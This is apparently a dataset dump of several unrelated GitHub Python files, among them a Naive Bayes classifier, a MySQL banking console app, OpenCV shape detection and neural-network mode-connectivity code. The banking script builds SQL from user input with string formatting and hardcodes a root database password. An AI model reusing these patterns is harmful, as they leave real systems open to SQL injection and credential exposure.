classLabels=classes1\n testInstances=uniqueList2\n testLabel=classes2\n\n def getUniqueFeatures(testInstance):\n return list(set(testInstance))\n\n def getClassLabels(classLabels):\n return list(set(classLabels))\n\n def getDictionarySize(trainInstances):\n uniqueLabelList = []\n for i in range(len(trainInstances)):\n uniqueLabelList = uniqueLabelList + trainInstances[i]\n\n uniqueLabelList = list(set(uniqueLabelList))\n size = (len(uniqueLabelList))\n return size\n\n def getCountOfFeatureInClass(featureValue, classLabel, trainInstances, classLabels):\n count = 0\n for i in range(len(classLabels)):\n if (classLabels[i] == classLabel):\n count = count + trainInstances[i].count(featureValue)\n return count\n\n def getTotalFeaturesInClass(classLabel, trainInstances, classLabels):\n count = 0\n for i in range(len(classLabels)):\n if (classLabels[i] == classLabel):\n count = count + len(trainInstances[i])\n return count\n\n def getPrior(classLabel, classLabels):\n total = len(classLabels)\n count = classLabels.count(classLabel)\n return float(count / total)\n\n uniqueFeatures = getUniqueFeatures(testInstances[0])\n\n uniqueClassLabels = getClassLabels(classLabels)\n\n conditionalProb = np.zeros((len(uniqueFeatures), len(uniqueClassLabels)))\n\n priorProb = np.zeros((len(uniqueClassLabels)))\n\n for i in range(len(uniqueClassLabels)):\n priorProb[i] = float(getPrior(uniqueClassLabels[i], classLabels))\n\n B = getDictionarySize(trainInstances)\n\n for i in range(len(uniqueFeatures)):\n for j in range(len(uniqueClassLabels)):\n conditionalProb[i][j] = (getCountOfFeatureInClass(uniqueFeatures[i], uniqueClassLabels[j],trainInstances, classLabels) + 1) / (getTotalFeaturesInClass(uniqueClassLabels[j], trainInstances, classLabels) + B)\n listProbResults = np.zeros((len(testInstances), len(uniqueClassLabels)))\n\n for m in range(len(testInstances)):\n for i in range(len(uniqueClassLabels)):\n listProbResults[m][i] = priorProb[i]\n for j in range(len(testInstances[m])):\n if(uniqueFeatures.__contains__(testInstances[m][j])):\n # if(conditionalProb.__contains__(uniqueFeatures.index(testInstances[m][j]))):\n listProbResults[m][i] = listProbResults[m][i] * conditionalProb[uniqueFeatures.index(testInstances[m][j])][i]\n #print(listProbResults[0][0],\" \",len(testLabel),\" \",len(uniqueClassLabels))\n counter = 0\n for j in range(len(listProbResults)):\n max = -1\n maxNumber=-1\n for i in range(len(uniqueClassLabels)):\n temp = listProbResults[j][i]\n if (temp > max):\n max = temp\n maxNumber = i\n # if(j==10):\n # #print(i,\" \",listProbResults[j][i])\n tempAns = uniqueClassLabels[maxNumber]\n # if(j==10):\n # print(tempAns,\" \",testLabel[j])\n if (tempAns == testLabel[j]):\n counter = counter + 1\n accuracy = counter / (len(testLabel))\n return accuracy\n\n''' ======================== MAIN FUNCTION ============================='''\nif __name__ == \"__main__\":\n pp = Process()\n uniqueWordList1,classLabel1,uniqueWordList2,classLabel2=pp.readAllFiles()\n accu=pp.theNaiveBayes(uniqueWordList1,classLabel1,uniqueWordList2,classLabel2)\n print(\"Accuracy\",(accu*100))","repo_name":"maitri2705/NaiveBayes","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"25096402532","text":"import time\r\nimport pyodbc\r\nfrom src import *\r\n\r\ndef connect_db():\r\n # Строка подключения к БД\r\n cs = f'DRIVER={DRIVER_NAME};User={UID};Password={PWD};Database={DATABASE};Server={HOSTNAME};Port={PORT};'\r\n try:\r\n connect = pyodbc.connect(cs)\r\n print_log('База данных успешно подключена')\r\n return connect\r\n except Exception as error:\r\n print_log('При подключении к БД возникла ошибка:', True)\r\n print_log(error, True)\r\n exit(-1)\r\n\r\n\r\ndef run():\r\n last_filename = ''\r\n while True:\r\n file = get_last_file(last_filename) # Импортирование актуального эксель файла\r\n\r\n if file is not None:\r\n connect = connect_db() # Подключение к БД\r\n last_trans_id = max_trans_id(connect) # Получение последнего номера транзакции\r\n transactions_df = parsing_excel(file, last_trans_id) # Парсинг эксель файла\r\n if len(transactions_df) == 0:\r\n print_log('Новые транзакции не найдены')\r\n else:\r\n insert_data(transactions_df, connect) # Вставка данных в БД\r\n connect.close()\r\n print_log('Подключение к БД закрыто')\r\n last_filename = file.name\r\n time.sleep(15)\r\n\r\n\r\nif __name__ == '__main__':\r\n run()","repo_name":"arkiix/sberbank","sub_path":"Project/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"37873469434","text":"from django.conf.urls import url\nfrom . import views\n\n\napp_name = 'signup'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^luck/$', views.luck, name='luck'),\n url(r'^disabled/$', views.disabled, name=\"disabled\"),\n]\n","repo_name":"atabekmad/signup4clinic","sub_path":"clinicsignup/apps/signup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30437881731","text":"'''\n\nScope of the project:\n\nImplementing a banking management system using Mysql.\n\n\nFeatures:\n\nMAIN MENU\n\n1. Insert Record/Records\n2. Display records as per account number\n a. Sorted as per account number\n b. Sorted as per customer Name\n c. Sorted as per Customer Balance\n3. Search record details as per the account number\n4. Update record\n5. Delete Record\n6. TransactionDebit/Withdraw from the account\n a.\tDebit/Withdraw from account\n b.\tCredit into account\n7. Exit\n\n\nStep by step procedures:\n\n•\t1 .Download MySQL\n\nDownload Xampp control panel and use phpmy admin as UI\n( port 3308 default 3306. But here 3306 already taken by mysql.so changed port to 3306)\n\n•\tSetting up password for root in phpMyAdmin\n\nClick admin, it will open phpMyAdmin. In user_accounts -edit privileages in 3 root ..>\ngive password ..> generate ..>Go\n\nIn local storage:\nXampp ..> phpMyAdmin..> config.inc.php\nAdd password b/w ‘ ’\nXampp ..> mysql ..>bin ..>my.ini\nAfter[mysql d]\nAdd one more line skip-grant-tables\n\n \n2.Setting up MySQLdb\n\nIt is an interface for connecting to a MySQL database server from python.\nFor that we have to install two packages\n1.\tmysql-connector-python (pip install mysql-connector-python)\n2.\tmysql-python (pip install mysql-python)\nnow import MySQLdb\n\n3. Create database -bankdb\n\n4. Create Table\n\nuser \n1.\tAccount_no\n2.\tName\n3.\tMobile number\n4.\tAddress\n5.\tcountry\n6.\tEmail\n7.\tAccount Balance\n\n\ntransactions\n\n1. trans_no\n2. trans_type (debit/credit)\n3. trans time Credit/debit datetime\n4. Account current balance\n5. Transaction amount\n6. user_id( foreign key of account no)\n\n5. write function for displaying menu\n\n6. if 1 then - create a new account.insert the data given into users db\n\n7. if 2 then display the sub menu and then use SELECT and ORDER query to show \nthe user in sorted way.\n\n8.search records as per account no- use SELECT and WHERE clause .Use pandas dataframe to view as table.\n\n9. Update account of the user - ask for account no --then choose what to updatw --Then use UPDATE clause\n\n10 . Delete account -ask for acc_no and use DELETE clause\n\n11.credit/credit - ask for credit or debit,amount - insert data into transactions db - update balance in users db\n\n12. display transactions -- SELECT from transaction table as per account no\n\n13.exit - create while loop --if select exit --exit the while loop --else continue displaying menu bar.\n\n'''\n\n\n\n\n\n\n# import MySQLdb -interface for connecting with sql database\n\nimport MySQLdb\nimport pandas as pd\n\n\n# connect to database\n\nconn=MySQLdb.connect(\n host=\"127.0.0.1\",\n user=\"root\",\n password=\"bhagya\",\n database=\"bankdb\",\n port=3308)\n\ncursor=conn.cursor()\n\n\n# Create Database\n\ndef create_db():\n\n cursor.excecute(\"CREATE DATABASE bankdb\")\n\n\n# create table\n\ndef create_table():\n \n cursor.execute(\"CREATE TABLE users (\\\n account_no INT NOT NULL AUTO_INCREMENT,\\\n Name VARCHAR(40) NOT NULL,\\\n Mobile_no VARCHAR(40) NOT NULL,\\\n Address VARCHAR(100) NOT NULL,\\\n Country VARCHAR(100) NOT NULL,\\\n Email VARCHAR(100) NOT NULL,\\\n Balance INT DEFAULT 0,\\\n PRIMARY KEY(account_no))\")\n\n cursor.execute(\"CREATE TABLE transactions (\\\n trans_no INT NOT NULL AUTO_INCREMENT,\\\n user_id INT,\\\n trans_type VARCHAR(40) NOT NULL,\\\n Trans_date TIMESTAMP DEFAULT current_timestamp,\\\n Trans_amount INT NOT NULL\\\n Current_balance INT NOT NULL,\\\n PRIMARY KEY(trans_no),\\\n FOREIGN KEY(user_id)\\\n REFERENCES users(account_no))\")\n\n#create_table()\n\n\ndef add_demodata():\n\n cursor.execute(\"INSERT INTO users(Name,Mobile_no,Address,Country,Email)\\\n VALUES('bhagya','5566778009','address city','india','bhagya@gmail.com'),\\\n ('bhavya','1166888009','add city','india','bhavya@gmail.com')\")\n conn.commit()\n\n#add_demodata()\n\n# Function to define - menu bar\n\n\ndef menu():\n print('*'*100)\n print('Welcome to Bank servives')\n print('1.Add account')\n print('2.Display users')\n print('3.Search records as per account no')\n print('4.Update records of user')\n print('5.Delete records of user')\n print('6.credit to /debit from account')\n print('7.show transactions')\n print('8.exit')\n print('*'*100)\n\n try:\n user_input=input(\"enter the no of services : \")\n return(user_input)\n except:\n print(\"invalid input\")\n\n\ndef sub_menu():\n print('a. sorted as per account no')\n print('b. sorted as per customer Name')\n print('c. sorted as per customer balnce')\n print('d. back to menu')\n print('*'*100)\n try:\n sub_input=input(\"enter any options listed : \")\n if sub_input=='d':\n menu\n return (sub_input)\n except:\n print(\"invalid input\")\n\n\n\ndef add_account():\n try :\n \n print('*'*100)\n print(\"enter your details to create account!\")\n name=input(\"enter your name : \")\n mobile=input(\"enter your mobile no : \")\n address=input(\"enter your adress : \")\n country=input(\"enter your contry : \")\n email=input(\"enter your email : \")\n records=[]\n records.append(name)\n records.append(mobile)\n records.append(address)\n records.append(country)\n records.append(email)\n\n\n print(records)\n cursor.execute(\"INSERT INTO users(Name,Mobile_no,Address,Country,Email)\\\n VALUES(%s,%s,%s,%s,%s)\",records)\n conn.commit()\n print('Account created successfully!')\n print('*'*100)\n except:\n print(\"invalid input\")\n\n\ndef display_records(sort_by):\n\n try:\n data=cursor.execute(\"SELECT * FROM users ORDER BY {}\".format(sort_by))\n data=cursor.fetchall()\n\n if len(data)!=0:\n print('='*100)\n df=pd.DataFrame(list(data),columns=['Account_no','Name','Mobile_no','Address','Country','Email','Balance'])\n print(df.to_string()) # 'to_string' used to display all columns ,otherwise df will reduce the columns\n print('='*100)\n else:\n print(\"no records found!\")\n \n except:\n print(\"invalid input\")\n \n \ndef search_records(search_by):\n\n try: \n data=cursor.execute(\"SELECT * FROM users WHERE account_no={} \".format(search_by))\n data=cursor.fetchall()\n\n if len(data)!=0:\n print('='*100)\n df=pd.DataFrame(list(data),columns=['Account_no','Name','Mobile_no','Address','Country','Email','Balance'])\n print(df.to_string()) # 'to_string' used to display all columns ,otherwise df will reduce the columns\n print('='*100)\n else:\n print(\"no records found!\")\n except:\n print(\"invalid input\")\n \n \ndef update_records(acc_no,update_by,set_inp):\n\n try:\n \n data=cursor.execute(\"UPDATE users SET {}='{}' WHERE account_no={}\".format(update_by,set_inp,acc_no)) # give '' for values\n data=cursor.execute(\"SELECT * FROM users WHERE account_no={} \".format(acc_no))\n data=cursor.fetchall()\n if len(data)!=0 :\n print('='*100)\n df=pd.DataFrame(list(data),columns=['Account_no','Name','Mobile_no','Address','Country','Email','Balance'])\n print(df.to_string()) # 'to_string' used to display all columns ,otherwise df will reduce the columns\n print('='*100)\n else:\n print(\"no records found!\")\n \n except:\n print(\"invalid input\")\n\n \n\ndef delete_record(acc_no):\n try:\n data=cursor.execute(\"DELETE FROM users WHERE account_no= '%s'\"%(acc_no))\n conn.commit()\n \n if data!=0:\n print(data,\"data deleted succesfully!\")\n else:\n print(\"no records found!\")\n \n except:\n print(\"invalid input\")\n\n \n\ndef trans_record(acc_no,trans_type,trans_amt):\n \n try:\n data=cursor.execute(\"SELECT Balance FROM users WHERE account_no={} \".format(acc_no))\n data=cursor.fetchall()\n\n if(len(data)!=0):\n balance=data[0][0]\n if trans_type==\"debit\":\n curr_balance=balance-trans_amt\n if trans_type==\"credit\":\n curr_balance=balance+trans_amt\n\n if curr_balance>0:\n \n cursor.execute(\"INSERT INTO transactions(user_id,trans_type,Trans_amount,Current_balance)\\\n VALUES({},'{}',{},{})\".format(acc_no,trans_type,trans_amt,curr_balance))\n conn.commit()\n \n\n cursor.execute(\"UPDATE users SET Balance={} WHERE account_no={}\".format(curr_balance,acc_no))\n conn.commit()\n\n print(\" Transaction done successfully!.current balance is {}\".format(curr_balance))\n\n else:\n print(\"insufficent balance\")\n else:\n print(\"No records found\")\n \n except:\n print(\"invalid input\")\n\n \ndef display_trans(search_by):\n\n try: \n data=cursor.execute(\"SELECT * FROM transactions WHERE user_id={} \".format(search_by))\n data=cursor.fetchall()\n \n\n if len(data)!=0:\n print('='*100)\n df=pd.DataFrame(list(data),columns=['trans_id','Account no','type','Date','current balance','trans_amount'])\n print(df.to_string()) # 'to_string' used to display all columns ,otherwise df will reduce the columns\n print('='*100)\n else:\n print(\"No records found\")\n except:\n print(\"invalid input\")\n\n\n#===========================call functions according to user input=========================\n \nloop=True\nwhile loop==True:\n \n user_input=menu()\n print(user_input)\n\n # create account\n if user_input=='1':\n add_account()\n\n # display record\n if user_input=='2':\n sub_input=sub_menu()\n\n if sub_input=='a':\n display_records('account_no')\n\n if sub_input=='b':\n display_records('Name')\n\n if sub_input=='c':\n display_records('Balance')\n\n # search by account no \n if user_input=='3':\n acc_inp=input(\"enter the account no : \")\n search_records(int(acc_inp))\n \n\n # update user record \n if user_input=='4':\n acc_inp=input(\"enter the account no : \")\n print(\"enter the record you want to edit\")\n print(\"1.Name\")\n print(\"2.Mobile_no\")\n print(\"3.Address\")\n print(\"4.Email\")\n print(\"5.country\")\n \n up_inp=input(\"enter the category : \")\n if up_inp=='1':\n update_by='Name'\n if up_inp=='2':\n update_by='Mobile_no'\n if up_inp=='3':\n update_by='Address'\n if up_inp=='4':\n update_by='Email'\n if up_inp=='5':\n update_by='Country'\n\n set_inp=str(input(\"enter that details : \"))\n update_records(int(acc_inp),update_by,set_inp)\n\n\n # delete the user record\n\n if user_input=='5':\n acc_inp=input(\"enter the account no : \")\n delete_record(acc_inp)\n \n \n # Credit or debit into account\n\n if user_input=='6':\n acc_inp=input(\"enter the account no : \")\n or_inp=input(\" choose\\\n a. credit\\\n b. debit : \")\n if or_inp=='a':\n trans_type=\"credit\"\n elif or_inp=='b':\n trans_type=\"debit\"\n\n\n trans_amt=input(\"enter the amount\")\n\n trans_record(acc_inp,trans_type,int(trans_amt))\n \n # display transactions\n\n if user_input=='7':\n acc_inp=input(\"enter the account no : \")\n display_trans(acc_inp)\n\n \n # exit loop\n \n if user_input=='8':\n loop=False\n print(\"exiting.................\") \n \n\n \n\n\n\n \n\n\n","repo_name":"Bhagyasree-dhanil/Database-projects","sub_path":"Banking_management_sql.py","file_name":"Banking_management_sql.py","file_ext":"py","file_size_in_byte":11955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19879432669","text":"#!/usr/bin/python3.5\n\nfrom shapedetector import ShapeDetector\nimport argparse\nimport imutils\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom time import sleep\n\n\ndef auto_canny(image, sigma=0.95):\n\t# compute the median of the single channel pixel intensities\n\tv = np.median(image)\n \n\t# apply automatic Canny edge detection using the computed median\n\tlower = int(max(0, (1.0 - sigma) * v))\n\tupper = int(min(255, (1.0 + sigma) * v))\n\tedged = cv2.Canny(image, lower, upper)\n \n\t# return the edged image\n\treturn edged\n\n\n\n\nif __name__ == \"__main__\":\n\tvideo = cv2.VideoCapture('Video_sample.mp4')\n\n\n\twhile(video.isOpened()):\n\t\tret, img = video.read()\n\t\tmask = np.zeros_like(img)\n\n\t\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tgray = cv2.equalizeHist(gray)\n\n\t\tthresh = cv2.threshold(gray, 25, 255, cv2.THRESH_BINARY)[1]\n\t\tedge = auto_canny(thresh)\n\n\t\t(_, cnts, _) = cv2.findContours(edge.copy(), cv2.RETR_EXTERNAL,\n\t\t\tcv2.CHAIN_APPROX_SIMPLE)\n\n\t\tfor c in cnts:\n\t\t\t# compute the center of the contour, then detect the name of the\n\t\t\t# shape using only the contour\n\t\t\tM = cv2.moments(c)\n\n\t\t\tif M['m00'] != 0:\n\t\t\t\tcx = int(M['m10']/M['m00'])\n\t\t\t\tcy = int(M['m01']/M['m00'])\n\t\t\t\tarea = cv2.contourArea(c)\n\n\t\t\t\tif (32 1:\n x -= 1\n\nprint(total)","repo_name":"lanhhoang/big-o","sub_path":"week-02/day-03/homework/439_devu_the_dumb_guy.py","file_name":"439_devu_the_dumb_guy.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12275480545","text":"import copy\nimport utils\nimport torch\nimport torch.nn as nn\nfrom models.classifiers import RandomSamplerParallel, MultiLinear\nimport numpy as np\nimport random\nimport pandas as pd\nimport seaborn as sns\nimport os\nimport matplotlib.pyplot as plt\nimport argparse\n\nclass Path(object):\n\n def __init__(self, model):\n\n \"\"\"\n Init the path from a given model (simply coy the architecutre)\n \"\"\"\n\n self.model = copy.deepcopy(model)\n self.points = []\n self.reverse = False\n\n @property\n def step(self):\n\n return 1 if not self.reverse else -1\n\n def append(self, solution):\n \"\"\"\n Sparsify the solution found by the subnetwork procedure\n Solution is a FCN Classifier\n \"\"\"\n if type(solution) is not tuple:\n solution = (solution,)\n\n self.points.append(tuple(torch.nn.utils.parameters_to_vector(s.parameters()) for s in solution[::self.step]))\n\n pass\n\n def extend(self, other):\n\n assert (not self.reverse)\n self.points.extend(other.points[::other.step])\n\n def connect(self):\n \"\"\"Connect the last two sparsified solutions\"\"\"\n pass\n\ndef eval_path(path, sizes, dirname):\n\n global device\n os.makedirs(dirname, exist_ok=True)\n param_B = path.points[0][0]\n A = copy.deepcopy(path.model).requires_grad_(False)\n AB = copy.deepcopy(path.model).requires_grad_(False)\n B = copy.deepcopy(path.model).requires_grad_(False)\n # nn.utils.vector_to_parameters(param_B, B.parameters())\n A.to(device)\n AB.to(device)\n B.to(device)\n K = 11\n lbdas = np.arange(1, K) / (K-1)\n index = pd.MultiIndex.from_product([range(len(path.points)), range(0, K-1)], names=[\"point\", \"t\"])\n stats = ['loss', 'error']\n sets = [\"train\", \"test\"]\n names=['set', 'stat', 'try']\n tries = [1]\n columns=pd.MultiIndex.from_product([sets, stats, tries], names=names)\n stats = pd.DataFrame(index=index, columns=columns)\n reverse = False\n # A = None\n # for\n\n for idx, pt in enumerate(path.points):\n # pt is a tuple\n\n if len(pt) == 1:\n param_A = pt[0].to(device)\n nn.utils.vector_to_parameters(param_A, model.parameters()) # param_A from previous iteration\n # print(f\"error: {err}, loss: {loss}\")\n # if idx == 0:\n loss, err = eval_epoch(model, train_loader)\n loss_test, err_test = eval_epoch(model, test_loader)\n stats.loc[(idx), 0] = loss, err, loss_test, err_test # consider the index of the path at K-1 as the new point\n\n continue\n elif len(pt) == 2:\n # len(pt) == 2\n # the point is (B,C)\n # have to create intermediate point AB and walk from AB to B\n if not reverse:\n param_B = pt[0].to(device)\n # param_AB = copy.copy(A) # from the previous iterations\n # param_A = pt[1]\n\n nn.utils.vector_to_parameters(param_A, A.parameters()) # param_A from previous iteration\n nn.utils.vector_to_parameters(param_B, AB.parameters()) # param_B from this iteration\n nn.utils.vector_to_parameters(param_B, B.parameters()) # param_B from this iteration\n # nn.\n AB.main[-1].weight.data = A.main[-1].weight.data\n AB.main[-1].bias.data = A.main[-1].bias.data\n param_AB = nn.utils.parameters_to_vector(AB.parameters()).to(device)\n param_A = pt[1].to(device) # next starting point\n else:\n # reverse mode, fetch the next point\n # reverse role of AB and B, load A with next point\n\n param_AB = pt[1].to(device)\n param_A = path.points[idx+1][0].to(device) # the next point\n nn.utils.vector_to_parameters(param_A, A.parameters()) # param_A from previous iteration\n nn.utils.vector_to_parameters(param_AB, AB.parameters()) # param_B from this iteration\n nn.utils.vector_to_parameters(param_AB, B.parameters()) # param_A from previous iteration\n\n B.main[-1].weight.data = A.main[-1].weight.data\n B.main[-1].bias.data = A.main[-1].bias.data\n # else: # first point\n param_B = nn.utils.parameters_to_vector(B.parameters()).to(device)\n # B = pt\n\n elif len(pt) == 3:\n # at thispoint the last status for A is the model with\n # joint between the two paths\n reverse = True\n param_A = pt[0].to(device)\n param_B = pt[1].to(device)\n param_C = pt[2].to(device)\n\n nn.utils.vector_to_parameters(param_A, A.parameters())\n nn.utils.vector_to_parameters(param_B, AB.parameters())\n\n # nn.utils.vector_to_parameters(param_C, C.parameters())\n AB.main[-1].weight.data = A.main[-1].weight.data\n AB.main[-1].bias.data = A.main[-1].bias.data\n param_AB = nn.utils.parameters_to_vector(AB.parameters()).to(device)\n param_A = param_C\n\n # BC.main[-1].weight = C.main[-1].weight\n # BC.main[-1].bias = C.main[-1].bias\n for tidx, t in enumerate(lbdas, 1):\n pt = (1-t) * param_AB + t * param_B\n nn.utils.vector_to_parameters(pt, model.parameters())\n loss, err = eval_epoch(model, train_loader)\n loss_test, err_test = eval_epoch(model, test_loader)\n # print(f\"error: {err}, loss: {loss}\")\n stats.loc[(idx-1+tidx//(K-1), tidx%(K-1))] = loss, err, loss_test, err_test # consider the index of the path at K-1 as the new point\n # stats.loc[(idx-1+tidx//(K-1), tidx%(K-1))] = loss_test, err_test # consider the index of the path at K-1 as the new point\n\n # model.to(torch.device('cpu'))\n return stats\n\ndef plot_path(stats, quant_ds, quant_ref, dirname):\n # df_plot = pd.melt(stats.reset_index(), id_vars=[\"point\", \"t\"], ignore_index=False)\n Idx = pd.IndexSlice\n # df_plot.index.name = \"index\"\n for setn in [\"train\", \"test\"]:\n for stat in [\"loss\", \"error\"]:\n # df_plot = stats.loc[:, Idx[stat, :]].reset_index()\n ax = stats.plot(kind=\"line\",\n # sns.lineplot(\n # data=df_plot,\n y=(setn,stat)\n )\n # )\n ax.axline((0,quant_ref[stat, setn]), (1, quant_ref[stat, setn]), ls=\":\", zorder=2, c='g')\n ax.axline((0,quant_ds[stat, setn]), (1, quant_ds[stat, setn]), ls=\":\", zorder=2, c='r')\n\n plt.savefig(fname=os.path.join(dirname, f'path_{setn}_{stat}.pdf'), bbox_inches=\"tight\")\n stats.to_csv(os.path.join(dirname, f'path.csv'))\n plt.close(\"all\")\n\n\n\ndef read_csv(fname):\n stats = pd.read_csv(fname, header=[0,1,2], index_col=[0,1])\n stat_idx = stats.columns.names.index(\"stat\")\n nlevels = stats.columns.nlevels\n if \"err\" in stats.columns.get_level_values(\"stat\"):\n new_stat_lvl = [s.replace(\"err\", \"error\") for s in stats.columns.get_level_values(stat_idx)]\n # new_stat.sort()\n levels = [stats.columns.get_level_values(i) if i != stat_idx else new_stat_lvl for i in range(nlevels)]\n cols = pd.MultiIndex.from_arrays(levels, names=stats.columns.names)\n stats.columns = cols\n stats.to_csv(fname)\n\n return stats\n\n\n\n\n\n\n\"\"\"\nComplement of a permutation with total number of elements\n\"\"\"\ndef complement_perm(perm, total):\n idx = 0\n cperm= []\n i = 0\n while idx < total:\n while i 0 else 0\n device = torch.device('cuda' if use_cuda else 'cpu', gpu_index)\n\n fn_log_model = os.path.join(os.path.dirname(args.M1), 'logs.txt')\n archi_model = utils.parse_archi(fn_log_model)\n fn_model = args.M1\n chkpt_model = torch.load(fn_model, map_location=lambda storage, location: storage)\n model = copy.deepcopy(utils.construct_FCN(archi_model))\n path = Path(model)\n args_model = chkpt_model[\"args\"]\n # args_model = chkpt_model[\"args\"]\n # model.requires_grad_(False)\n # selsol =model\n # path.extend(selsol)\n n_layer = utils.count_hidden_layers(model)\n ntry = 1\n\n imresize=None\n train_dataset, test_dataset, num_chs = utils.get_dataset(dataset=args_model.dataset,\n dataroot=args_model.dataroot,\n imresize =imresize,\n normalize= args_model.normalize if hasattr(args_model, 'normalize') else False,\n )\n # print('Transform: {}'.format(train_dataset.transform), file=logs, flush=True)\n train_loader, size_train,\\\n test_loader, size_test = utils.get_dataloader( train_dataset,\n test_dataset, batch_size\n =args_model.batch_size,\n size_max=100, #args_model.size_max,\n collate_fn=None,\n pin_memory=True)\n paths = dict()\n models = dict()\n quant_ref = pd.DataFrame()\n quant_ds = pd.DataFrame()\n Idx = pd.IndexSlice\n for mid, fn_model in enumerate([args.M1, args.M2], 1):\n\n models[mid] = copy.deepcopy(utils.construct_FCN(archi_model)) # copy the model\n model = models[mid]\n dir_model = os.path.dirname(fn_model)\n dir_expA = os.path.join(dir_model, args.nameA) # the directories of the experiments\n dir_expB = os.path.join(dir_model, args.nameB)\n\n fn_ds = os.path.join(dir_expB, \"eval_copy.pth\") # the filename for the experiment B\n chkpt_ds = torch.load(fn_ds, map_location=lambda storage, loc: storage)\n quant = chkpt_ds[\"quant\"]\n quant_ref = pd.concat([quant_ref, quant.loc[1, Idx[0, :, :]].to_frame().transpose()], ignore_index=True, axis=0)\n idx_max = quant.loc[:, Idx[1:, \"loss\", \"train\"]].idxmax(axis=1)\n idx_ds = quant[idx_max].idxmin()\n quant_ds = pd.concat([quant_ds, quant.loc[idx_ds[1][0], Idx[idx_ds.keys()[1][0], :, :]].to_frame().transpose()], ignore_index=True, axis=0) # select the step and the layer that define the bound\n chkpt_model = torch.load(fn_model, map_location=lambda storage, loc: storage)\n model.load_state_dict(chkpt_model['model'])\n paths[mid] = Path(model)\n path = paths[mid]\n path.reverse = mid == 2\n path.append(model) # first points\n # args_model = chkpt_model[\"args\"]\n model.requires_grad_(False)\n for eid in range(n_layer, -1, -1):\n fn_log_sol = os.path.join(dir_expA, f\"logs_entry_{eid}.txt\")\n fn_solution = os.path.join(dir_expA, f\"checkpoint_entry_{eid}.pth\")\n chkpt = torch.load(fn_solution, map_location=lambda storage, loc: storage)\n archi_sol = utils.parse_archi(fn_log_sol)\n solution = utils.construct_classifier(archi_sol)\n solution.load_state_dict(chkpt['classifier'])\n solution.requires_grad_(False)\n # eval_epoch(solution, train_loadr, ntry)\n if eid == 0:\n path = last_layer(solution, model, path)\n else:\n path = sparsify(solution, model, path, ntry)\n # model.to(device)\n # err, loss = eval_epoch(model, train_loader)\n # print(f\"error: {err}, loss: {loss}\")\n # model.to(torch.device('cpu'))\n #both paths are computed\n\n quant_ds.index = [1,2]\n quant_ref.index = [1,2]\n quant_ds = quant_ds.mean().droplevel(\"layer\")\n quant_ref = quant_ref.mean().droplevel(\"layer\")\n sizes = [l.in_features for l in solution.network if isinstance(l, nn.Linear)] + [solution.network[-1].out_features]\n connect_two_models(paths[1], models[1], models[2], sizes)\n\n paths[1].extend(paths[2]) # terminate the path 1 with path 2\n dname = args.output if args.output is not None else os.path.join(os.path.commonpath([args.M1,args.M2]), \"path\")\n os.makedirs(dname, exist_ok=True)\n quant_ds.to_csv(os.path.join(dname, \"B.csv\"))\n quant_ref.to_csv(os.path.join(dname, \"ref.csv\"))\n stats = eval_path(paths[1], sizes, dirname=dname)\n stats.to_csv(os.path.join(dname, f'A.csv'))\n\n\n\n\n\n\n","repo_name":"modeconnectivity/modeconnectivity","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":24986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"1539440456","text":"import numpy as np\n\nimport openmdao.api as om\n\n\nclass PanelForcesSurf(om.ExplicitComponent):\n \"\"\"\n Take in the computed panel forces and convert them to sectional forces\n for each surface. Basically just takes the long array that has info\n for all surfaces and creates a new output for each surface with only\n that surface's panel forces.\n\n Parameters\n ----------\n panel_forces[system_size, 3] : numpy array\n All of the forces acting on all panels in the total system.\n\n Returns\n -------\n sec_forces[nx-1, ny-1, 3] : numpy array\n Only the panel forces for one individual lifting surface.\n There is one of these per surface.\n \"\"\"\n\n def initialize(self):\n self.options.declare(\"surfaces\", types=list)\n\n def setup(self):\n surfaces = self.options[\"surfaces\"]\n\n system_size = 0\n\n # Loop through the surfaces to get the total system size\n for surface in surfaces:\n mesh = surface[\"mesh\"]\n nx = mesh.shape[0]\n ny = mesh.shape[1]\n\n system_size += (nx - 1) * (ny - 1)\n\n arange = np.arange(3 * system_size)\n\n self.add_input(\"panel_forces\", shape=(system_size, 3), units=\"N\")\n\n # Loop through the surfaces and add the output of sec_forces based on\n # the size of each surface. Here we keep track of the total indices\n # from panel_forces to make sure the forces go to the correct output\n ind1, ind2 = 0, 0\n for surface in surfaces:\n mesh = surface[\"mesh\"]\n nx = mesh.shape[0]\n ny = mesh.shape[1]\n name = surface[\"name\"]\n\n sec_forces_name = \"{}_sec_forces\".format(name)\n\n ind2 += (nx - 1) * (ny - 1) * 3\n\n self.add_output(sec_forces_name, shape=(nx - 1, ny - 1, 3), units=\"N\", tags=[\"mphys_coupling\"])\n\n rows = np.arange((nx - 1) * (ny - 1) * 3)\n cols = arange[ind1:ind2]\n self.declare_partials(sec_forces_name, \"panel_forces\", val=1.0, rows=rows, cols=cols)\n\n ind1 += (nx - 1) * (ny - 1) * 3\n\n def compute(self, inputs, outputs):\n surfaces = self.options[\"surfaces\"]\n\n ind1, ind2 = 0, 0\n for surface in surfaces:\n mesh = surface[\"mesh\"]\n nx = mesh.shape[0]\n ny = mesh.shape[1]\n name = surface[\"name\"]\n\n sec_forces_name = \"{}_sec_forces\".format(name)\n\n ind2 += (nx - 1) * (ny - 1)\n\n # Just pluck out the relevant forces and reshape them\n outputs[sec_forces_name] = inputs[\"panel_forces\"][ind1:ind2].reshape((nx - 1, ny - 1, 3))\n\n ind1 += (nx - 1) * (ny - 